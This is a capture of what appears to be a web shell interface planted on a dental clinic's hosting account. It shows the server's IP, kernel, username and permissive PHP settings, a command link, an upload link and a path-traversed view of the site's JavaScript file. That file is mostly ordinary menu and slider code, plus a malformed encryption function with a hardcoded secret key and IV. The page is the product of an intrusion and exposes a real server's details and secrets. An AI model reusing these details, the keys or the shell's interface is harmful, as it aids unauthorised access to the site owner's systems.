1Server IP : 217.21.90.164 / Your IP : 18.226.163.186 Web Server : LiteSpeed System : Linux in-mum-web840.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u367232671 ( 367232671) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u367232671/domains/zeropaindentist.com/public_html/img/product/offer/../../../js/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
function ENC(string, action = 'encrypt') { var encrypt_method = 'AES-256-CBC'; var secret_key = 'ZvOLdaDY4222yxiAVQuD3xg9bjbJ'; // user define private key var secret_iv = 'B7hm482C0zj'; // user define secret key var key = hash('sha256', secret_key); var iv = substr(hash('sha256', secret_iv), 0, 16); // sha256 is hash_hmac_algo var output; if (action == 'encrypt') { output = openssl_encrypt(string, encrypt_method, key, 0, iv); output = base64_encode(output); } else if ($action == 'dec') { output = openssl_decrypt(base64_decode(string), encrypt_method, key, 0, iv); } return output; } function dentalMenutoggale() { document.getElementById('dentalMenuList').classList.toggle('show'); } function cosmeticMenutoggale() { document.getElementById('cosmeticMenuList').classList.toggle('show'); } var swiper = new Swiper(".myTestimonao", { slidesPerView: 1, breakpoints: { 1200: { slidesPerView: 2, spaceBetween: 30, }, }, spaceBetween: 30, pagination: { el: ".swiper-pagination", clickable: true, }, autoplay: { delay: 2500, disableOnInteraction: false, }, });